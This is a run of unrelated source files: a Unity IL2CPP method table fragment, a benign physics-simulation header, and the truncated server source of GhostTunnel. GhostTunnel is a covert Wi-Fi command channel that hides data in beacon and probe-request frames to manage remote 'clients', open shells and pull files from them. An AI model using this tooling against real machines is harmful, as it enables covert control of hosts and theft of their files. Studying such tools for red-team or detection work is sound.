211/*211*/}, { 4835, 4082/*(Il2CppMethodPointer)&Predicate_1_Invoke_m122788314_gshared*/, 1282/*1282*/}, { 4836, 4083/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m2959352225_gshared*/, 1624/*1624*/}, { 4837, 4084/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m924884444_gshared*/, 1/*1*/}, { 4838, 4085/*(Il2CppMethodPointer)&Predicate_1__ctor_m1567825400_gshared*/, 211/*211*/}, { 4839, 4086/*(Il2CppMethodPointer)&Predicate_1_Invoke_m3860206640_gshared*/, 1284/*1284*/}, { 4840, 4087/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m4068629879_gshared*/, 1625/*1625*/}, { 4841, 4088/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m973058386_gshared*/, 1/*1*/}, { 4842, 4089/*(Il2CppMethodPointer)&Predicate_1__ctor_m1020292372_gshared*/, 211/*211*/}, { 4843, 4090/*(Il2CppMethodPointer)&Predicate_1_Invoke_m3539717340_gshared*/, 1291/*1291*/}, { 4844, 4091/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m3056726495_gshared*/, 1626/*1626*/}, { 4845, 4092/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m2354180346_gshared*/, 1/*1*/}, { 4846, 4093/*(Il2CppMethodPointer)&Predicate_1__ctor_m784266182_gshared*/, 211/*211*/}, { 4847, 4094/*(Il2CppMethodPointer)&Predicate_1_Invoke_m577088274_gshared*/, 1292/*1292*/}, { 4848, 4095/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m2329589669_gshared*/, 1627/*1627*/}, { 4849, 4096/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m3442731496_gshared*/, 1/*1*/}, { 4850, 4097/*(Il2CppMethodPointer)&Predicate_1__ctor_m549279630_gshared*/, 211/*211*/}, { 4851, 4098/*(Il2CppMethodPointer)&Predicate_1_Invoke_m2883675618_gshared*/, 1293/*1293*/}, { 4852, 4099/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m3926587117_gshared*/, 1628/*1628*/}, { 4853, 4100/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m337889472_gshared*/, 1/*1*/}, { 4854, 4101/*(Il2CppMethodPointer)&Predicate_1__ctor_m2863314033_gshared*/, 211/*211*/}, { 4855, 4102/*(Il2CppMethodPointer)&Predicate_1_Invoke_m3001657933_gshared*/, 915/*915*/}, { 4856, 4103/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m866207434_gshared*/, 1629/*1629*/}, { 4857, 4104/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m3406729927_gshared*/, 1/*1*/}, { 4858, 4105/*(Il2CppMethodPointer)&Predicate_1__ctor_m3243601712_gshared*/, 211/*211*/}, { 4859, 4106/*(Il2CppMethodPointer)&Predicate_1_Invoke_m2775223656_gshared*/, 916/*916*/}, { 4860, 4107/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m1764756107_gshared*/, 1630/*1630*/}, { 4861, 4108/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m1035116514_gshared*/, 1/*1*/}, { 4862, 4109/*(Il2CppMethodPointer)&Predicate_1__ctor_m2995226103_gshared*/, 211/*211*/}, { 4863, 4110/*(Il2CppMethodPointer)&Predicate_1_Invoke_m2407726575_gshared*/, 1295/*1295*/}, { 4864, 4111/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m2425667920_gshared*/, 1631/*1631*/}, { 4865, 4112/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m2420144145_gshared*/, 1/*1*/}, { 4866, 4113/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m3960522888_gshared*/, 90/*90*/}, { 4867, 4114/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m1024093742_gshared*/, 44/*44*/}, { 4868, 4115/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m3700810968_gshared*/, 90/*90*/}, { 4869, 4116/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m3198150842_gshared*/, 42/*42*/}, { 4870, 4117/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m687018726_gshared*/, 90/*90*/}, { 4871, 4118/*(Il2CppMethodPointer)&CachedInvokableCall_1_Invoke_m3335223860_gshared*/, 136/*136*/}, { 4872, 4119/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m1584932671_gshared*/, 8/*8*/}, { 4873, 4120/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m1006265619_gshared*/, 90/*90*/}, { 4874, 4121/*(Il2CppMethodPointer)&InvokableCall_1_add_Delegate_m4247246760_gshared*/, 90/*90*/}, { 4875, 4122/*(Il2CppMethodPointer)&InvokableCall_1_remove_Delegate_m719609401_gshared*/, 90/*90*/}, { 4876, 4123/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m1137436818_gshared*/, 90/*90*/}, { 4877, 4124/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m144857499_gshared*/, 44/*44*/}, { 4878, 4125/*(Il2CppMethodPointer)&InvokableCall_1_Find_m2191789532_gshared*/, 2/*2*/}, { 4879, 4126/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m3447590157_gshared*/, 8/*8*/}, { 4880, 4127/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m992371221_gshared*/, 90/*90*/}, { 4881, 4128/*(Il2CppMethodPointer)&InvokableCall_1_add_Delegate_m2168298468_gshared*/, 90/*90*/}, { 4882, 4129/*(Il2CppMethodPointer)&InvokableCall_1_remove_Delegate_m3013073467_gshared*/, 90/*90*/}, { 4883, 4130/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m2228071798_gshared*/, 90/*90*/}, { 4884, 4131/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m3574781157_gshared*/, 42/*42*/}, { 4885, 4132/*(Il2CppMethodPointer)&InvokableCall_1_Find_m2419401136_gshared*/, 2/*2*/}, { 4886, 4133/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m975753341_gshared*/, 8/*8*/}, { 4887, 4134/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m277967109_gshared*/, 90/*90*/}, { 4888, 4135/*(Il2CppMethodPointer)&InvokableCall_1_add_Delegate_m1529423074_gshared*/, 90/*90*/}, { 4889, 4136/*(Il2CppMethodPointer)&InvokableCall_1_remove_Delegate_m3696225443_gshared*/, 90/*90*/}, { 4890, 4137/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m417090952_gshared*/, 90/*90*/}, { 4891, 4138/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m3776037445_gshared*/, 136/*136*/}, { 4892, 4139/*(Il2CppMethodPointer)&InvokableCall_1_Find_m3791347974_gshared*/, 2/*2*/}, { 4893, 4140/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m3479156378_gshared*/, 8/*8*/}, { 4894, 4141/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m2376533784_gshared*/, 90/*90*/}, { 4895, 4142/*(Il2CppMethodPointer)&InvokableCall_1_add_Delegate_m3812704047_gshared*/, 90/*90*/}, { 4896, 4143/*(Il2CppMethodPointer)&InvokableCall_1_remove_Delegate_m1153955194_gshared*/, 90/*90*/}, { 4897, 4144/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m4175555003_gshared*/, 90/*90*/}, { 4898, 4145/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m790246888_gshared*/, 783/*783*/}, { 4899, 4146/*(Il2CppMethodPointer)&InvokableCall_1_Find_m1347741199_gshared*/, 2/*2*/}, { 4900, 4147/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m5879926_gshared*/, 8/*8*/}, { 4901, 4148/*(Il2CppMethodPointer)&InvokableCall_1__ctor_m2021220028_gshared*/, 90/*90*/}, { 4902, 4149/*(Il2CppMethodPointer)&InvokableCall_1_add_Delegate_m2030429961_gshared*/, 90/*90*/}, { 4903, 4150/*(Il2CppMethodPointer)&InvokableCall_1_remove_Delegate_m526494270_gshared*/, 90/*90*/}, { 4904, 4151/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m2048320961_gshared*/, 90/*90*/}, { 4905, 4152/*(Il2CppMethodPointer)&InvokableCall_1_Invoke_m2266073988_gshared*/, 810/*810*/}, { 4906, 4153/*(Il2CppMethodPointer)&InvokableCall_1_Find_m3120026609_gshared*/, 2/*2*/}, { 4907, 4154/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m4265739384_gshared*/, 44/*44*/}, { 4908, 4155/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m2825236457_gshared*/, 959/*959*/}, { 4909, 4156/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m1471580180_gshared*/, 90/*90*/}, { 4910, 4157/*(Il2CppMethodPointer)&UnityAction_1__ctor_m407092282_gshared*/, 211/*211*/}, { 4911, 4158/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m1591970292_gshared*/, 42/*42*/}, { 4912, 4159/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m4082776663_gshared*/, 960/*960*/}, { 4913, 4160/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m1582293408_gshared*/, 90/*90*/}, { 4914, 4161/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m2060046626_gshared*/, 136/*136*/}, { 4915, 4162/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m2168063775_gshared*/, 1632/*1632*/}, { 4916, 4163/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m3986105162_gshared*/, 90/*90*/}, { 4917, 4164/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m2903588655_gshared*/, 783/*783*/}, { 4918, 4165/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m53286204_gshared*/, 1633/*1633*/}, { 4919, 4166/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m2302584705_gshared*/, 90/*90*/}, { 4920, 4167/*(Il2CppMethodPointer)&UnityAction_1__ctor_m2722591915_gshared*/, 211/*211*/}, { 4921, 4168/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m773726226_gshared*/, 1634/*1634*/}, { 4922, 4169/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m902670333_gshared*/, 90/*90*/}, { 4923, 4170/*(Il2CppMethodPointer)&UnityAction_1__ctor_m4241521541_gshared*/, 211/*211*/}, { 4924, 4171/*(Il2CppMethodPointer)&UnityAction_1_Invoke_m3163507089_gshared*/, 810/*810*/}, { 4925, 4172/*(Il2CppMethodPointer)&UnityAction_1_BeginInvoke_m1026512492_gshared*/, 1629/*1629*/}, { 4926, 4173/*(Il2CppMethodPointer)&UnityAction_1_EndInvoke_m350315359_gshared*/, 90/*90*/}, { 4927, 4174/*(Il2CppMethodPointer)&UnityAction_2__ctor_m2014538647_gshared*/, 211/*211*/}, { 4928, 4175/*(Il2CppMethodPointer)&UnityAction_2_BeginInvoke_m1856481569_gshared*/, 1635/*1635*/}, { 4929, 4176/*(Il2CppMethodPointer)&UnityAction_2_EndInvoke_m2153035205_gshared*/, 90/*90*/}, { 4930, 4177/*(Il2CppMethodPointer)&UnityAction_2__ctor_m2686130524_gshared*/, 211/*211*/}, { 4931, 4178/*(Il2CppMethodPointer)&UnityAction_2_BeginInvoke_m2906232794_gshared*/, 1636/*1636*/}, { 4932, 4179/*(Il2CppMethodPointer)&UnityAction_2_EndInvoke_m847734934_gshared*/, 90/*90*/}, { 4933, 4180/*(Il2CppMethodPointer)&UnityEvent_1_RemoveListener_m2931831786_gshared*/, 90/*90*/}, { 4934, 4181/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m755088078_gshared*/, 40/*40*/}, { 4935, 4182/*(Il2CppMethodPointer)&UnityEvent_1_AddListener_m2665780961_gshared*/, 90/*90*/}, { 4936, 4183/*(Il2CppMethodPointer)&UnityEvent_1_RemoveListener_m690574722_gshared*/, 90/*90*/}, { 4937, 4184/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m1413279282_gshared*/, 40/*40*/}, { 4938, 4185/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m915269642_gshared*/, 40/*40*/}, { 4939, 4186/*(Il2CppMethodPointer)&UnityEvent_1_RemoveListener_m337930005_gshared*/, 90/*90*/}, { 4940, 4187/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m492361873_gshared*/, 40/*40*/}, { 4941, 4188/*(Il2CppMethodPointer)&UnityEvent_1_AddListener_m2474865626_gshared*/, 90/*90*/}, { 4942, 4189/*(Il2CppMethodPointer)&UnityEvent_1_RemoveListener_m905719695_gshared*/, 90/*90*/}, { 4943, 4190/*(Il2CppMethodPointer)&UnityEvent_1_GetDelegate_m4072848279_gshared*/, 40/*40*/}, { 4944, 4191/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0__ctor_m1750247524_gshared*/, 0/*0*/}, { 4945, 4192/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_MoveNext_m2339115502_gshared*/, 43/*43*/}, { 4946, 4193/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_System_Collections_Generic_IEnumeratorU3CobjectU3E_get_Current_m1702093362_gshared*/, 4/*4*/}, { 4947, 4194/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_System_Collections_IEnumerator_get_Current_m4267712042_gshared*/, 4/*4*/}, { 4948, 4195/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_Dispose_m3903217005_gshared*/, 0/*0*/}, { 4949, 4196/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_Reset_m2580847683_gshared*/, 0/*0*/}, { 4950, 4197/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0__ctor_m951808111_gshared*/, 0/*0*/}, { 4951, 4198/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_MoveNext_m42377021_gshared*/, 43/*43*/}, { 4952, 4199/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_System_Collections_Generic_IEnumeratorU3CobjectU3E_get_Current_m1821360549_gshared*/, 4/*4*/}, { 4953, 4200/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_System_Collections_IEnumerator_get_Current_m635744877_gshared*/, 4/*4*/}, { 4954, 4201/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_Dispose_m1161010130_gshared*/, 0/*0*/}, { 4955, 4202/*(Il2CppMethodPointer)&U3CStartU3Ec__Iterator0_Reset_m1787863864_gshared*/, 0/*0*/}, { 4956, 4203/*(Il2CppMethodPointer)&TweenRunner_1_Start_m1160751894_gshared*/, 1637/*1637*/}, { 4957, 4204/*(Il2CppMethodPointer)&TweenRunner_1_Start_m791129861_gshared*/, 1638/*1638*/}, { 4958, 4205/*(Il2CppMethodPointer)&TweenRunner_1_StopTween_m2135918118_gshared*/, 0/*0*/}, { 4959, 4206/*(Il2CppMethodPointer)&ListPool_1__cctor_m408291388_gshared*/, 0/*0*/}, { 4960, 4207/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m2151100132_gshared*/, 90/*90*/}, { 4961, 4208/*(Il2CppMethodPointer)&ListPool_1__cctor_m1262585838_gshared*/, 0/*0*/}, { 4962, 4209/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m334430706_gshared*/, 90/*90*/}, { 4963, 4210/*(Il2CppMethodPointer)&ListPool_1__cctor_m4150135476_gshared*/, 0/*0*/}, { 4964, 4211/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m4179519904_gshared*/, 90/*90*/}, { 4965, 4212/*(Il2CppMethodPointer)&ListPool_1__cctor_m709904475_gshared*/, 0/*0*/}, { 4966, 4213/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m1243609651_gshared*/, 90/*90*/}, { 4967, 4214/*(Il2CppMethodPointer)&ListPool_1__cctor_m3678794464_gshared*/, 0/*0*/}, { 4968, 4215/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m3030633432_gshared*/, 90/*90*/}, { 4969, 4216/*(Il2CppMethodPointer)&ListPool_1__cctor_m1474516473_gshared*/, 0/*0*/}, { 4970, 4217/*(Il2CppMethodPointer)&ListPool_1_U3Cs_ListPoolU3Em__0_m3090281341_gshared*/, 90/*90*/}, };
82e32982cb2df4a523ace9e745e5d34a0199c2d9
e94409baa6864db04a7785fbd7346c9e95dc85d5
/sources/sim/gsim4/GsimData/GsimData/GsimRandData.h
8b4484cdb2f17dd3aff8727cfa830c791626daad
[]
no_license
laerad84/e14
3d9be7b6712df3534dcba2132a6f9e3ed8b517fc
89875a124b1d7bb960b5919e75747c90bf72996d
refs/heads/master
2016-09-16T00:46:33.493744
2012-06-18T06:46:57
2012-06-18T06:46:57
null
0
0
null
null
null
null
UTF-8
C++
false
false
2,316
h
GsimRandData.h
/** * @file * @brief GsimEventData * $Id: GsimRandData.h,v 1.2 2006/12/06 18:38:38 nanjo Exp $ * $Log: GsimRandData.h,v $ * Revision 1.2 2006/12/06 18:38:38 nanjo * CVS variables. * */ #ifndef GsimRandData_h #define GsimRandData_h //includes #include "TObject.h" #include <string> #include <vector> //forward declaration /** * @class GsimRandData * @brief This class stores event data for output to a ROOT file. * * The event ID and an array of tracks are stored. */ class GsimRandData : public TObject { public: /** * @function GsimRandData * @brief Constructor for GsimRandData. */ GsimRandData(); /** * @function ~GsimRandData * @brief Destructor for GsimRandData. */ virtual ~GsimRandData(); virtual void Clear(Option_t* opt=""); /** * @function initializeDataValues * @brief Initializes the event. * @param id The event ID. * * Initializes the event ID to the given value and clears the briefTracks. */ void initializeDataValues(); static bool getSeed(std::string tfName,int treeID,int eventID, std::vector<unsigned long>& seedVector); /** * @function getClassName * @brief Returns the name of the class - "GsimRandData". */ std::string getClassName(); UShort_t run_number; UInt_t event_number; UInt_t engineID; /// Seed of Mersenne Twister /** * std::vector<unsigned long> vSeed = HepRandom::getTheEngine()->put(); * size is 626 * [0] engine flag * #include "CLHEP/Random/engineIDulong.h" * CLHEP::crc32ul("MTwistEngine"); * [1]-[624] seeds list * The single seed used in setSeed(seed) is placed * at the 1st position of seeds list. * [625] counter value (1..624) */ UInt_t seed[624];//[624] UInt_t count; UShort_t version; //seed1; //sedd2; //thisID; protected: /** * @brief The name of this event. * * Currently (release 0-5), this is left blank - "". */ std::string name;//! /** * @brief The name of the class. * * This is hardcoded to "GsimRandData". */ std::string className;//! ClassDef(GsimRandData,1) }; inline std::string GsimRandData::getClassName() { return className; } #endif // GsimRandData_h
6bea3d9a05b13afa5e31215204b7965eb6d7b62b
3d26a2a30b9691972251f7c92fa93ad57cd63aec
/src/gt_server.cpp
64a0989cede4ef18348bf33e13f2a85905fe095b
[]
no_license
RickyCga/gtbackup
49ac13e04470b41d37637b3a3ed01f3f54ada3d0
b592205054505d0a6e4a266dd6d5a37f3d3af543
refs/heads/master
2020-03-26T23:28:43.541759
2018-08-21T10:19:39
2018-08-21T10:19:39
145,545,675
1
1
null
null
null
null
UTF-8
C++
false
false
21,162
cpp
gt_server.cpp
/* * Copyright (C) 2018 E7mer of PegasusTeam <haimohk@gmail.com> * * This file is a part of GhostTunnel * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA * */ #include <stdarg.h> #include<iconv.h> #include <sys/stat.h> #include "gt_server.h" char *ptver = " ____ __ ___ _____ _______ \n" \ " |___ \\ / / / _ \\| __ \\ |__ __| \n" \ " __) |/ /_ | | | | |__) |__ __ _ __ _ ___ _ _ ___| | ___ __ _ _ __ ___ \n" \ " |__ <| '_ \\| | | | ___/ _ \\/ _` |/ _` / __| | | / __| |/ _ \\/ _` | '_ ` _ \\ \n" \ " ___) | (_) | |_| | | | __/ (_| | (_| \\__ \\ |_| \\__ \\ | __/ (_| | | | | | |\n" \ " |____/ \\___/ \\___/|_| \\___|\\__, |\\__,_|___/\\__,_|___/_|\\___|\\__,_|_| |_| |_|\n" \ " __/ | \n" \ " |___/ \n"; struct gt_command { const char *cmd; int (*handler)(void *param, int argc, char *argv[]); char ** (*completion)(const char *str, int pos); const char *usage; }; static const struct gt_command ghost_tunnel_commands[] = { { "sessions", &gt_server::cmd_list, NULL, "= list all clients" }, { "use", &gt_server::cmd_use, NULL, "= select a client to operate, use [clientID]" }, { "exit", &gt_server::cmd_exit, NULL, "= exit current operation" }, { "wget", &gt_server::cmd_wget, NULL, "= download a file from a client, wget [filepath]" }, { "quit", &gt_server::cmd_quit, NULL, "= quit ghost tunnel" }, { "help", &gt_server::cmd_help, /*ghost_tunnel_complete_help*/NULL, "= show this usage help" }, { NULL, NULL, NULL, NULL } }; char logbuf[1024]; int gt_log(const char *format, ...) { int n; va_list ap; va_start(ap, format); n=vsnprintf (logbuf, 1024, format, ap); va_end(ap); printf("%s\n", logbuf); edit_print_ps(); return n; } gt_server::gt_server() { running = false; srand(time(NULL)); server_id = random() % 256; cur_client_id = 1; sequence_number = 0; cur_op_client = NULL; fp = NULL; pthread_mutex_init(&send_queue_mutex, NULL); } gt_server::~gt_server() { if(running){ running = false; gt_cnsl.destroy(); //osdep_stop(); } pthread_mutex_destroy(&send_queue_mutex); } bool gt_server::initlize(const char *rinterface, const char *winterface) { char szerr[1024] = {0}; int mode = 0; int ret = -1; riface = rinterface; wiface = winterface; if(riface == wiface) { ret = kismet_get_mode(rinterface, szerr, &mode); if(ret != 0){ printf("ERROR: interface %s is not available.\n", rinterface); return false; } kismet_interface_down(rinterface, szerr); kismet_set_mode(rinterface, szerr, 6); kismet_set_channel(rinterface, 1, szerr); kismet_interface_up(rinterface, szerr); } else { ret = kismet_get_mode(rinterface, szerr, &mode); if(ret != 0){ printf("ERROR: interface %s is not available.\n", rinterface); return false; } ret = kismet_get_mode(winterface, szerr, &mode); if(ret != 0){ printf("ERROR: interface %s is not available.\n", winterface); return false; } kismet_interface_down(rinterface, szerr); kismet_set_mode(rinterface, szerr, 6); kismet_set_channel(rinterface, 1, szerr); kismet_interface_up(rinterface, szerr); kismet_interface_down(winterface, szerr); kismet_set_mode(winterface, szerr, 6); kismet_set_channel(winterface, 1, szerr); kismet_interface_up(winterface, szerr); } return true; } int gt_server::start() { pthread_t tid; int ret; ret = osdep_start(const_cast<char*>(riface.c_str()), const_cast<char*>(wiface.c_str())); if(ret == 0) { running = true; ret = pthread_create(&tid, NULL, receive_thread, this); if(ret != 0) { osdep_stop(); return -1; } ret = pthread_create(&tid, NULL, send_thread, this); ret = pthread_create(&tid, NULL, handle_conn_thread, this); printf("%s", ptver); gt_cnsl.initlize(edit_cmd_command_cb, edit_eof_cb, edit_completion_cb, this, 0, "ghost_tunnel"); } return 0; } int gt_server::send(unsigned char client_id, TUNNEL_DATA_TYPE data_type, unsigned char *data, unsigned int len) { unsigned char send_buf[300]; unsigned char *ssid = send_buf; unsigned char ssid_length = 0; unsigned char *vendor = NULL; unsigned char vendor_length = 0; tunnel_data_header tdh = {0}; unsigned short total_length = sizeof(tunnel_data_header) + len; client_session *cs; if(!client_session_query(client_id, &cs)) return -1; tdh.flag = 0xFE; tdh.data_type = data_type; tdh.seq = cs->send_seq++; /// TODO tdh.client_id = client_id; tdh.server_id = server_id; if(total_length > 32) { tdh.data_type |= DATA_IN_VENDOR; tdh.length = 32 - sizeof(tunnel_data_header); vendor = send_buf + 32; vendor_length = total_length - 32; ssid_length = 32; } else { tdh.length = len; ssid_length = total_length; } memset(send_buf, 0, sizeof(send_buf)); memcpy(send_buf, &tdh, sizeof(tunnel_data_header)); memcpy(send_buf + sizeof(tunnel_data_header), data, len); send_pkt sp; sp.client_id = client_id; sp.seq = tdh.seq; sp.pkt = create_tunnel_beacon_packet(ssid, ssid_length, vendor, vendor_length); pthread_mutex_lock(&send_queue_mutex); send_queue.push(sp); pthread_mutex_unlock(&send_queue_mutex); return 0; } struct packet gt_server::create_tunnel_beacon_packet(unsigned char *ssid, unsigned char ssid_len, unsigned char *vendor, unsigned char vendor_len) { struct packet beacon; struct beacon_fixed *bf; static uint64_t internal_timestamp = 0; struct ether_addr bc; struct ether_addr bssid = /*{{0xd0,0xfa,0x1d,0x20,0x08,0xa6}};//*/generate_mac(MAC_KIND_AP); MAC_SET_BCAST(bc); create_ieee_hdr(&beacon, IEEE80211_TYPE_BEACON, 'a', 0, bc, bssid, bssid, SE_NULLMAC, 0); bf = (struct beacon_fixed *) (beacon.data + beacon.len); internal_timestamp += 0x400 * DEFAULT_BEACON_INTERVAL; bf->timestamp = htole64(internal_timestamp); bf->interval = htole16(DEFAULT_BEACON_INTERVAL); bf->capabilities = 0x0000; bf->capabilities |= 0x0010; beacon.len += sizeof(struct beacon_fixed); // SSID beacon.data[beacon.len] = 0x00; //SSID parameter set beacon.data[beacon.len+1] = ssid_len; //SSID len memcpy(beacon.data + beacon.len + 2, ssid, ssid_len); //Copy the SSID beacon.len += ssid_len + 2; // supported rates memcpy(beacon.data + beacon.len, DEFAULT_11B_RATES, 6); //11 MBit beacon.len += 6; // channel memcpy(beacon.data + beacon.len, DEFAULT_CHANNEL, 3); beacon.len += 3; // tim memcpy(beacon.data + beacon.len, DEFAULT_TIM, 6); beacon.len += 6; // erp memcpy(beacon.data + beacon.len, DEFAULT_ERP, 3); beacon.len += 3; // extended rates memcpy(beacon.data + beacon.len, DEFAULT_11G_RATES, 10); //54 MBit beacon.len += 10; // wpa memcpy(beacon.data + beacon.len, DEFAULT_WPA_AES_TAG, 26); beacon.len += 26; // default vendor memcpy(beacon.data + beacon.len, DEFAULT_VENDOR, 26); beacon.len += 26; // vendor if(vendor) { beacon.data[beacon.len] = 0xDD; beacon.data[beacon.len+1] = vendor_len; memcpy(beacon.data + beacon.len + 2, vendor, vendor_len); beacon.len += vendor_len + 2; } return beacon; } void* gt_server::handle_conn_thread(void *param) { gt_server *pgts = (gt_server*)param; client_manager_map::iterator it; int times=0; int times1=0; while(pgts->running) { for(it=pgts->client_session_mgr.begin(); it!=pgts->client_session_mgr.end();it++) { pgts->send(it->second.id, TUNNEL_CON_HEARTBEAT, NULL, 0); } sleep(30); } } void* gt_server::send_thread(void *param) { gt_server *pgts = (gt_server*)param; send_pkt sp; int times; while(pgts->running) { if(!pgts->send_queue.empty()) { pthread_mutex_lock(&pgts->send_queue_mutex); sp = pgts->send_queue.front(); pthread_mutex_unlock(&pgts->send_queue_mutex); times = 2000; while(times) { osdep_send_packet(&sp.pkt); usleep(100); times--; } pthread_mutex_lock(&pgts->send_queue_mutex); pgts->send_queue.pop(); pthread_mutex_unlock(&pgts->send_queue_mutex); } usleep(100); } } void* gt_server::receive_thread(void *param) { gt_server *pgts = (gt_server*)param; struct packet pkt; struct ieee_hdr *hdr; unsigned char gt_data[1024]; int gt_data_len = 0; while(pgts->running) { pkt = osdep_read_packet(); if (pkt.len == 0){ continue; } hdr = (struct ieee_hdr *) pkt.data; if (hdr->type == IEEE80211_TYPE_PROBEREQ ) { gt_data_len = 1024; if(0 == pgts->parse_data_from_probe_request(&pkt, gt_data, &gt_data_len)) pgts->handle_data(&pkt, gt_data, gt_data_len); } } } int gt_server::parse_data_from_probe_request(struct packet *pkt, unsigned char *data, int *len) { struct ieee_hdr *hdr = (struct ieee_hdr *) (pkt->data); unsigned char *tags = pkt->data + sizeof(struct ieee_hdr); tunnel_data_header *tdh; unsigned char ssid[32] = {0}; int left = pkt->len - sizeof(struct ieee_hdr); if(hdr->type != IEEE80211_TYPE_PROBEREQ || tags[0] != 0 || tags[1] > 32) // probe request, ssid, length return -1; memcpy(ssid, tags+2, tags[1]); tdh = (tunnel_data_header*)ssid; if(tdh->flag != 0xFE) // not ghost tunnel data { return -1; } if(tdh->data_type & DATA_IN_VENDOR) { tdh->data_type &= ~DATA_IN_VENDOR; left = left -2 - tags[1]; while(left > 0) { tags = tags + 2 + tags[1]; left = left - 2 - tags[1]; } if(tags[0] != 221) return -1; tdh->length += tags[1]; // total data length memcpy(data, ssid, 32); memcpy(data+32, tags+2, tags[1]); *len = 32 + tags[1]; } else { memcpy(data, ssid, sizeof(tunnel_data_header) + tdh->length); *len = sizeof(tunnel_data_header) + tdh->length; } return 0; } void gt_server::handle_data(struct packet *pkt, unsigned char *data, int len) { tunnel_data_header *tdh = (tunnel_data_header*)data; if(data == NULL || len < sizeof(tunnel_data_header)) return; switch(tdh->data_type & 0xF0) { case TUNNEL_SHELL: handle_shell(pkt, data, len); break; case TUNNEL_CON: handle_connect(pkt, data, len); break; case TUNNEL_FILE: handle_file(pkt, data, len); break; default: break; } } void gt_server::handle_connect(struct packet *pkt, unsigned char *data, int len) { tunnel_data_header *tdh = (tunnel_data_header*)data; struct ether_addr *src_mac = get_source(pkt); switch(tdh->data_type) { case TUNNEL_CON_CLIENT_REQ: { if(!client_session_exist(src_mac)) { unsigned char client_id = cur_client_id++; tunnel_online_info *toi = (tunnel_online_info *)(data + sizeof(tunnel_data_header)); client_session cs ={0}; cs.id = client_id; cs.seq = tdh->seq; cs.send_seq = 1; cs.os_version = toi->os; memcpy(cs.device_name, toi->device_name, tdh->length-1); cs.mac_addr = *src_mac; cs.is_connected = true; client_session_insert(&cs); send(client_id, TUNNEL_CON_SERVER_RES, data + sizeof(tunnel_data_header), tdh->length); gt_log("\nINFO: client %s online.\n", cs.device_name); } else { client_session 